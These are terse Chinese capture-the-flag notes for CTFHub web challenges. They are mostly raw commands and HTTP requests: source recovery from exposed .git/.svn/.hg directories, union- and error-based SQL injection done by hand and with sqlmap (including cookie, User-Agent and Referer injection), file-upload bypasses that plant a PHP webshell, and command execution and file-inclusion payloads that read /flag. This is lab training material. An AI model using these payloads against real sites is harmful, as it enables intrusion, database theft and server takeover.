在kali中使用GitHack
python GitHack.py http://challenge-4be834ffe995c3a3.sandbox.ctfhub.com:10800/.git
//日志文件会保存到GitHack目录中的dist目录下
git log
git diff 91722f3ef9cad1bb2841623dd18efcf5966dbd32
//查看flag
git stash list
git stash pop //注意要用root权限
python2 GitHack.py http://challenge-b30f32f8760f958c.sandbox.ctfhub.com:10800/.git
//先进入工具目录
./rip-svn.pl -v -u http://challenge-db225928ae10d29a.sandbox.ctfhub.com:10800/.svn
ls -al
cd .svn
cd pristine
cd 87
ls -al
cat 87cfa68f3ad388cc5010e87eb92ae7210a6564c9.svn-base
./rip-hg.pl -v -u http://challenge-fd4d14ab800ba8d3.sandbox.ctfhub.com:10800/.hg/
cd .hg
cd store
cat fncache
//得到data/flag_1296924402.txt.i,直接网址访问该文件
http://challenge-eafda9687e63cd2f.sandbox.ctfhub.com:10800/?id=1 order by 2
http://challenge-eafda9687e63cd2f.sandbox.ctfhub.com:10800/?id=-1%20union%20select%201,2
http://challenge-eafda9687e63cd2f.sandbox.ctfhub.com:10800/?id=-1%20union%20select%201,database()
http://challenge-eafda9687e63cd2f.sandbox.ctfhub.com:10800/?id=-1%20union%20select%201,group_concat(schema_name) from information_schema.schemata
http://challenge-eafda9687e63cd2f.sandbox.ctfhub.com:10800/?id=-1%20union%20select%201,group_concat(table_name)from information_schema.tables where table_schema='sqli'
http://challenge-eafda9687e63cd2f.sandbox.ctfhub.com:10800/?id=-1%20union%20select%201,group_concat(column_name)from information_schema.columns where table_name='flag' and table_schema='sqli'
http://challenge-eafda9687e63cd2f.sandbox.ctfhub.com:10800/?id=-1%20union%20select%201,group_concat(flag)from sqli.flag
#用Sqlmap辅助
py sqlmap.py -u http://challenge-a3af26520d93d2b0.sandbox.ctfhub.com:10800/?id=1 --current-db
py sqlmap.py -u http://challenge-a3af26520d93d2b0.sandbox.ctfhub.com:10800/?id=1 -dbs
py sqlmap.py -u http://challenge-a3af26520d93d2b0.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables --batch
py sqlmap.py -u http://challenge-a3af26520d93d2b0.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --columns --batch
py sqlmap.py -u http://challenge-a3af26520d93d2b0.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump
1、加单引号报错
http://challenge-910e90134305b344.sandbox.ctfhub.com:10800/?id=1'
2、加'and 1=1 -- '
http://challenge-910e90134305b344.sandbox.ctfhub.com:10800/?id=1'and 1=1 -- '
//这种注释符(--)后边必须跟一个空格
3、加'and 1=2 -- ',结果报错
通过以上三步就可以判定是字符型注入
order by 如果超出它的列数,则报错;如果恰好等于列数,显示$id=1的结果
http://challenge-910e90134305b344.sandbox.ctfhub.com:10800/?id=1' order by 2 -- '
判断回显位置
http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,2 -- ''
开始查数据
http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,user() -- ''
http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,version() -- ''
http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,database() -- ''
http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,group_concat(schema_name)from information_schema.schemata -- ''
http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli' -- ''
http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,group_concat(column_name)from information_schema.columns where table_schema='sqli' and table_name='flag' -- ''
http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,group_concat(flag)from sqli.flag -- ''
#用sqlmap辅助注入
py sqlmap.py -u http://challenge-a766a179b69b22b7.sandbox.ctfhub.com:10800/?id=1 --batch
py sqlmap.py -u http://challenge-a766a179b69b22b7.sandbox.ctfhub.com:10800/?id=1 -dbs --batch
py sqlmap.py -u http://challenge-a766a179b69b22b7.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump --batch
http://challenge-fb5b1d2dccdf80f6.sandbox.ctfhub.com:10800/?id=1 union select updatexml(1,concat(0x7e,database(),0x7e),1)
http://challenge-fb5b1d2dccdf80f6.sandbox.ctfhub.com:10800/?id=1 union select updatexml(1,concat(0x7e,(select(group_concat(table_name))from information_schema.tables where table_schema="sqli") ,0x7e),1)
http://challenge-fb5b1d2dccdf80f6.sandbox.ctfhub.com:10800/?id=1 union select updatexml(1,concat(0x7e,(select(group_concat(column_name))from information_schema.columns where table_schema="sqli" and table_name='flag') ,0x7e),1)
#得到flag的左半段(因为回显长度受限)
http://challenge-fb5b1d2dccdf80f6.sandbox.ctfhub.com:10800/?id=1 union select updatexml(1,concat(0x7e,(select(group_concat(flag))from sqli.flag) ,0x7e),1)
#用right()将后半段显示出来
http://challenge-fb5b1d2dccdf80f6.sandbox.ctfhub.com:10800/?id=1 union select updatexml(1,concat(0x7e,right((select(group_concat(flag))from sqli.flag) ,31),0x7e),1)
#用sqlmap辅助注入
py sqlmap.py -u http://challenge-a766a179b69b22b7.sandbox.ctfhub.com:10800/?id=1 --batch
py sqlmap.py -u http://challenge-a766a179b69b22b7.sandbox.ctfhub.com:10800/?id=1 -dbs --batch
py sqlmap.py -u http://challenge-a766a179b69b22b7.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump --batch
#这两种建议使用BP或者sqlmap辅助注入
#使用sqlmap
py sqlmap.py -u http://challenge-54100b7c311a20fc.sandbox.ctfhub.com:10800/ --cookie "id=1" --level=2 --dbs
py sqlmap.py -u http://challenge-54100b7c311a20fc.sandbox.ctfhub.com:10800/ --cookie "id=1" --level=2 -D sqli --tables --batch
py sqlmap.py -u http://challenge-54100b7c311a20fc.sandbox.ctfhub.com:10800/ --cookie "id=1" --level=2 -D sqli -T ktyrpqqkjq -C dmcwxicbvc --dump
#使用BP
GET / HTTP/1.1
Host: challenge-3d139840b13c5363.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: id=-1 union select 0,group_concat(column_name)from information_schema.columns where table_schema='sqli' and table_name='tjhiangrvk'; hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
GET / HTTP/1.1
Host: challenge-3d139840b13c5363.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: id=-1 union select 0,igdqkfgoxs from sqli.tjhiangrvk; hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
#sqlmap
py sqlmap.py -u http://challenge-55ef2e5d41014290.sandbox.ctfhub.com:10800/ --level=3 --dbs --batch
py sqlmap.py -u http://challenge-55ef2e5d41014290.sandbox.ctfhub.com:10800/ --level=3 -D sqli -T dgcskfxmlw --dump --batch
#BP
GET / HTTP/1.1
Host: challenge-6b012852328af0f2.sandbox.ctfhub.com:10800
User-Agent: -1 union select 1,group_concat(column_name)from information_schema.columns where table_schema='sqli' and table_name='wexbewzepo' #
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
GET / HTTP/1.1
Host: challenge-6b012852328af0f2.sandbox.ctfhub.com:10800
User-Agent: -1 union select 1,sxuftpsmzo from sqli.wexbewzepo #
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
#sqlmap 把level提高到5,时间可能会有点长
py sqlmap.py -u http://challenge-55ef2e5d41014290.sandbox.ctfhub.com:10800/ --level=5 --dbs --batch
#BP要先POST数据,然后再抓包,请求中才会带有Referer头
POST / HTTP/1.1
Host: challenge-c07172b49c84c52f.sandbox.ctfhub.com:10800
Content-Length: 4
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36
Origin: http://challenge-c07172b49c84c52f.sandbox.ctfhub.com:10800
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: -1 union select 1,group_concat(fxjlcnquao)from sqli.jutobmzrfj
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
id=1
#sqlmap
py sqlmap.py -u http://challenge-9f6b26b103520285.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables --tamper space2comment.py
以下省略
#手工注入
绕过空格过滤的方式: /**/、()、%0a
POST / HTTP/1.1
Host: challenge-9424bb26b9b28c71.sandbox.ctfhub.com:10800
Content-Length: 311
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36
Origin: http://challenge-9424bb26b9b28c71.sandbox.ctfhub.com:10800
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypThKx4ZJTFtPj3di
#这里的boundary只是标记表单各部分的开始和结束位置,不是验证文件类型的地方
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://challenge-9424bb26b9b28c71.sandbox.ctfhub.com:10800/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundarypThKx4ZJTFtPj3di
Content-Disposition: form-data; name="file"; filename="muma.php"
Content-Type: image/jpeg
#改这里!!!这里才是验证文件类型的地方
------WebKitFormBoundarypThKx4ZJTFtPj3di
Content-Disposition: form-data; name="submit"
Submit
------WebKitFormBoundarypThKx4ZJTFtPj3di--
BP抓包上传muma.php并修改请求报文即可
POST /?road=/var/www/html/upload/muma.php%00.jpg HTTP/1.1
#改这里!!!
Host: challenge-8a75a2e89de80f4b.sandbox.ctfhub.com:10800
Content-Length: 318
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://challenge-8a75a2e89de80f4b.sandbox.ctfhub.com:10800
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygRXig2JtdVHb7oLO
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://challenge-8a75a2e89de80f4b.sandbox.ctfhub.com:10800/?road=/var/www/html/upload/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundarygRXig2JtdVHb7oLO
Content-Disposition: form-data; name="file"; filename="muma.php%00.jpg"
Content-Type: image/jpeg
------WebKitFormBoundarygRXig2JtdVHb7oLO
Content-Disposition: form-data; name="submit"
Submit
------WebKitFormBoundarygRXig2JtdVHb7oLO--
然后蚁剑连接网址+upload/muma.php
#php里套个php
gif文件用记事本打开,在后面加一句话木马
然后bp抓包改文件后缀
http://challenge-762e9e51ed72cd7d.sandbox.ctfhub.com:10800/?cmd=system("ls /");
http://challenge-762e9e51ed72cd7d.sandbox.ctfhub.com:10800/?cmd=system("cat /flag_6055");
#源代码中有include,先包含目录中自带的shell.txt
http://challenge-d95f20cfaac12c8b.sandbox.ctfhub.com:10800/?file=shell.txt
#然后POST数据
ctfhub=system("ls /");
ctfhub=system("cat /flag");
#BP抓包,然后改为POST请求并加入php://input伪协议,再传入php指令
POST /?file=php://input HTTP/1.1
Host: challenge-8a0b4a527d4aa825.sandbox.ctfhub.com:10800
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Content-Type:application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 33
#知道了flag在/flag中
所以直接构造url http://challenge-f9c9636bfed0d1bb.sandbox.ctfhub.com:10800/?file=php://filter/resource=/flag
#或者可以用base64编码输出
http://challenge-f9c9636bfed0d1bb.sandbox.ctfhub.com:10800/?file=php://filter/read=convert.base64-encode/resource=/flag